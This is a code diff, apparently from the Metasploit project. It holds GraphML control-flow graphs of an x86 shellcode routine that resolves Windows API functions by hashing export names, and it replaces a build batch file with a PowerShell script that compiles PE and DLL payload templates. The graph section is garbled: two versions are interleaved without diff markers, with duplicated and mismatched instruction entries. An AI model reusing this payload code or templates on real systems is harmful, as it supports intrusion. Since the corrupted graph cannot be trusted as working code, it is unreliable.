<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
<edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
<edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
<edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
</graph>
</node>
<node id="block.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d">
<data key="address">0x103d</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x103a</data>
<data key="address">0x103d</data>
<data key="type">block</data>
<node id="block.0x103a:instruction.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d:instruction.0x103d">
<data key="address">0x103d</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x103a:instruction.0x103c">
<data key="address">0x103c</data>
<node id="block.0x103d:instruction.0x103f">
<data key="address">0x103f</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push eax</data>
</node>
<node id="block.0x103a:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x103d:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
</node>
<node id="block.0x103a:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x103d:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5820</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
</node>
<node id="block.0x103a:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x103d:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
<edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
</graph>
</node>
<node id="block.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048">
<data key="address">0x1048</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1045</data>
<data key="address">0x1048</data>
<data key="type">block</data>
<node id="block.0x1045:instruction.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048:instruction.0x1048">
<data key="address">0x1048</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c9</data>
<data key="instruction.source">test ecx, ecx</data>
</node>
<node id="block.0x1045:instruction.0x1047">
<data key="address">0x1047</data>
<node id="block.0x1048:instruction.0x104a">
<data key="address">0x104a</data>
<data key="type">instruction</data>
<data key="instruction.hex">743c</data>
<data key="instruction.source">je 0x1085</data>
<data key="instruction.hex">743a</data>
<data key="instruction.source">je 0x1086</data>
</node>
<edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
<edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
</graph>
</node>
<node id="block.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c">
<data key="address">0x104c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1049</data>
<data key="address">0x104c</data>
<data key="type">block</data>
<node id="block.0x1049:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1049:instruction.0x104a">
<data key="address">0x104a</data>
<node id="block.0x104c:instruction.0x104d">
<data key="address">0x104d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b348b</data>
<data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1049:instruction.0x104d">
<data key="address">0x104d</data>
<node id="block.0x104c:instruction.0x1050">
<data key="address">0x1050</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d6</data>
<data key="instruction.source">add esi, edx</data>
</node>
<node id="block.0x1049:instruction.0x104f">
<data key="address">0x104f</data>
<node id="block.0x104c:instruction.0x1052">
<data key="address">0x1052</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">8b7df8</data>
<data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
</node>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
<edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
</graph>
</node>
<node id="block.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055">
<data key="address">0x1055</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1051</data>
<data key="address">0x1055</data>
<data key="type">block</data>
<node id="block.0x1051:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055:instruction.0x1055">
<data key="address">0x1055</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1051:instruction.0x1053">
<data key="address">0x1053</data>
<node id="block.0x1055:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1051:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x1055:instruction.0x1058">
<data key="address">0x1058</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1051:instruction.0x1057">
<data key="address">0x1057</data>
<node id="block.0x1055:instruction.0x105b">
<data key="address">0x105b</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1051:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1055:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1051:instruction.0x105b">
<data key="address">0x105b</data>
<node id="block.0x1055:instruction.0x105f">
<data key="address">0x105f</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f4</data>
<data key="instruction.source">jne 0x1051</data>
<data key="instruction.source">jne 0x1055</data>
</node>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
</graph>
</node>
<node id="block.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1061">
<data key="address">0x1061</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x105d</data>
<data key="address">0x1061</data>
<data key="type">block</data>
<node id="block.0x105d:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">037df8</data>
<data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
</node>
<node id="block.0x105d:instruction.0x1060">
<data key="address">0x1060</data>
<node id="block.0x1061:instruction.0x1061">
<data key="address">0x1061</data>
<data key="type">instruction</data>
<data key="instruction.hex">3b7d24</data>
<data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
</node>
<node id="block.0x105d:instruction.0x1063">
<data key="address">0x1063</data>
<node id="block.0x1061:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">75e0</data>
<data key="instruction.source">jne 0x1045</data>
<data key="instruction.hex">75e2</data>
<data key="instruction.source">jne 0x1048</data>
</node>
<edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
<edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
<edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066">
<data key="address">0x1066</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1065</data>
<data key="address">0x1066</data>
<data key="type">block</data>
<node id="block.0x1065:instruction.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<node id="block.0x1065:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1066:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5824</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
</node>
<node id="block.0x1065:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1066:instruction.0x106a">
<data key="address">0x106a</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x106b">
<data key="address">0x106b</data>
<node id="block.0x1066:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">668b0c4b</data>
<data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
</node>
<node id="block.0x1065:instruction.0x106f">
<data key="address">0x106f</data>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b581c</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
</node>
<node id="block.0x1065:instruction.0x1072">
<data key="address">0x1072</data>
<node id="block.0x1066:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x1074">
<data key="address">0x1074</data>
<node id="block.0x1066:instruction.0x1075">
<data key="address">0x1075</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b048b</data>
<data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1065:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1066:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1065:instruction.0x1079">
<data key="address">0x1079</data>
<node id="block.0x1066:instruction.0x107a">
<data key="address">0x107a</data>
<data key="type">instruction</data>
<data key="instruction.hex">89442424</data>
<data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
</node>
<node id="block.0x1065:instruction.0x107d">
<data key="address">0x107d</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107e">
<node id="block.0x1066:instruction.0x107e">
<data key="address">0x107e</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107f">
<node id="block.0x1066:instruction.0x107f">
<data key="address">0x107f</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1066:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">61</data>
<data key="instruction.source">popal</data>
</node>
<node id="block.0x1065:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1066:instruction.0x1081">
<data key="address">0x1081</data>
<data key="type">instruction</data>
<data key="instruction.hex">59</data>
<data key="instruction.source">pop ecx</data>
</node>
<node id="block.0x1065:instruction.0x1081">
<data key="address">0x1081</data>
<node id="block.0x1066:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1065:instruction.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1066:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">51</data>
<data key="instruction.source">push ecx</data>
</node>
<node id="block.0x1065:instruction.0x1083">
<data key="address">0x1083</data>
<node id="block.0x1066:instruction.0x1084">
<data key="address">0x1084</data>
<data key="type">instruction</data>
<data key="instruction.hex">ffe0</data>
<data key="instruction.source">jmp eax</data>
</node>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
<edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
</graph>
</node>
<node id="block.0x1085">
<data key="address">0x1085</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1085</data>
<data key="type">block</data>
<node id="block.0x1085:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
<edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
</graph>
</node>
<node id="block.0x1086">
@@ -566,44 +545,58 @@
<node id="block.0x1086:instruction.0x1086">
<data key="address">0x1086</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
</graph>
</node>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">5f</data>
<data key="instruction.source">pop edi</data>
</node>
<node id="block.0x1086:instruction.0x1087">
<data key="address">0x1087</data>
<node id="block.0x1087:instruction.0x1088">
<data key="address">0x1088</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1086:instruction.0x1088">
<data key="address">0x1088</data>
<node id="block.0x1087:instruction.0x1089">
<data key="address">0x1089</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b12</data>
<data key="instruction.source">mov edx, dword ptr [edx]</data>
</node>
<node id="block.0x1086:instruction.0x108a">
<data key="address">0x108a</data>
<node id="block.0x1087:instruction.0x108b">
<data key="address">0x108b</data>
<data key="type">instruction</data>
<data key="instruction.hex">eb83</data>
<data key="instruction.hex">eb82</data>
<data key="instruction.source">jmp 0x100f</data>
</node>
<edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
<edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
<edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
<edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
<edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
</graph>
</node>
<edge source="block.0x1000" target="block.0x100f"/>
<edge source="block.0x100f" target="block.0x1018"/>
<edge source="block.0x1018" target="block.0x101f"/>
<edge source="block.0x101f" target="block.0x1021"/>
<edge source="block.0x1021" target="block.0x1029"/>
<edge source="block.0x1029" target="block.0x103a"/>
<edge source="block.0x103a" target="block.0x1045"/>
<edge source="block.0x1045" target="block.0x1049"/>
<edge source="block.0x1049" target="block.0x1051"/>
<edge source="block.0x1051" target="block.0x105d"/>
<edge source="block.0x105d" target="block.0x1065"/>
<edge source="block.0x1065" target="block.0x1085"/>
<edge source="block.0x1085" target="block.0x1086"/>
<edge source="block.0x100f" target="block.0x101b"/>
<edge source="block.0x101b" target="block.0x1022"/>
<edge source="block.0x1022" target="block.0x1024"/>
<edge source="block.0x1024" target="block.0x102c"/>
<edge source="block.0x102c" target="block.0x103d"/>
<edge source="block.0x103d" target="block.0x1048"/>
<edge source="block.0x1048" target="block.0x104c"/>
<edge source="block.0x104c" target="block.0x1055"/>
<edge source="block.0x1055" target="block.0x1061"/>
<edge source="block.0x1061" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1086"/>
<edge source="block.0x1086" target="block.0x1087"/>
</graph>
</graphml>
@@ -88,5 +88,7 @@ strtab:
db 0
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
@@ -94,5 +94,6 @@ strtab:
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
+15 -6
View File
@@ -2,9 +2,18 @@
This directory contains the source code for the PE executable templates.
## Building
Use the provided `build_all.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
folder. The current working directory when the build is run must be the source
code directory (`pe`).
Use the provided `build_all.ps1` script from within the Visual Studio developer
console. The script requires that the `%VCINSTALLDIR%` environment variable be
defined (which it should be by default). By default it builds all templates for
both x86 and x64, then moves the outputs into the correct folder.
```powershell
# build everything
.\build_all.ps1
# build only x86
.\build_all.ps1 -Architectures x86
# build only EXE templates
.\build_all.ps1 -Templates exe,exe_service
```
-17
View File
@@ -1,17 +0,0 @@
@echo off
echo Compiling DLLs
for /D %%d in (dll*) do (
pushd "%%d"
call build.bat
popd
)
echo Compiling EXEs
for /D %%e in (exe*) do (
pushd "%%e"
call build.bat
popd
)
+230
View File
@@ -0,0 +1,230 @@
<#
.SYNOPSIS
Build all PE executable and DLL templates for Metasploit.
.DESCRIPTION
Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
templates are patched to lower the minimum subsystem version so they can run
on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
linkers enforce a floor of 5.01/5.02 which is too high for those targets.
.PARAMETER Architectures
Which architectures to build. Defaults to both x86 and x64.
.PARAMETER Templates
Which templates to build. Defaults to all of them.
.EXAMPLE
.\build_all.ps1
.\build_all.ps1 -Architectures x86
.\build_all.ps1 -Templates exe,exe_service
#>
param(
[ValidateSet('x86', 'x64')]
[string[]]$Architectures = @('x86', 'x64'),
[ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
[string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
)
$ErrorActionPreference = 'Stop'
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
# Each entry defines only what varies per template. The build function handles
# the common logic: calling cl, optional 256KiB variant, PE version patching.
#
# Dir - subdirectory containing the source
# OutputFmt - output filename format string, {0} is replaced with the architecture
# Source - source file passed to cl
# ClFlags - flags passed to cl (before /link)
# LinkLibs - libraries passed to the linker (after /link)
# LinkRes - optional .res file to link
# EntryPoint - /entry value
# NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
# RcArgs - optional resource compiler arguments (run before cl)
# PatchVersion - if set, patch the PE subsystem version after linking
#
# DLL templates automatically get a 256KiB payload variant built alongside the
# standard size. This is determined by the output extension, not a per-template flag.
$BuildDefs = [ordered]@{
exe = @{
Dir = 'exe'
OutputFmt = 'template_{0}_windows.exe'
Source = 'template.c'
ClFlags = @('/GS-')
LinkLibs = @('kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
exe_service = @{
Dir = 'exe_service'
OutputFmt = 'template_{0}_windows_svc.exe'
Source = 'template.c'
ClFlags = @('/GS-', '/DBUILDMODE=2')
LinkLibs = @('advapi32.lib', 'kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
dll = @{
Dir = 'dll'
OutputFmt = 'template_{0}_windows.dll'
Source = 'template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', 'template.rc')
}
dll_gdiplus = @{
Dir = 'dll_gdiplus'
OutputFmt = 'template_{0}_windows_dccw_gdiplus.dll'
Source = '../dll/template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', '/fo', 'template.res', '../dll/template.rc')
}
dll_mixed_mode = @{
Dir = 'dll_mixed_mode'
OutputFmt = 'template_{0}_windows_mixed_mode.dll'
Source = 'template.cpp'
ClFlags = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
LinkLibs = @('mscoree.lib', 'kernel32.lib')
EntryPoint = 'DllMain'
}
}
if (-not $env:VCINSTALLDIR) {
Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
exit 1
}
function Invoke-VCVars {
param([string]$Arch)
# vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
# flags before re-running. Otherwise the second arch silently inherits
# the first arch's toolchain and produces wrong-architecture binaries.
foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
[System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
}
$vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
if ($_ -match '^([^=]+)=(.*)$') {
[System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
}
}
}
function Invoke-Cl {
param(
[string[]]$ClFlags,
[string]$Source,
[string]$OutputName,
[string[]]$LinkLibs,
[string]$LinkRes,
[string]$EntryPoint,
[switch]$NoDefaultLib
)
$clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
if ($LinkRes) { $clArgs += $LinkRes }
$clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
& cl @clArgs
if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
}
function Set-PEVersion {
param(
[string]$Path,
[int]$Major,
[int]$Minor
)
$bytes = [System.IO.File]::ReadAllBytes($Path)
$peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
Write-Error "$Path is not a valid PE file"
return
}
# PE optional header starts at peOffset + 24. Field offsets from its start:
# +40: MajorOperatingSystemVersion (uint16)
# +42: MinorOperatingSystemVersion (uint16)
# +48: MajorSubsystemVersion (uint16)
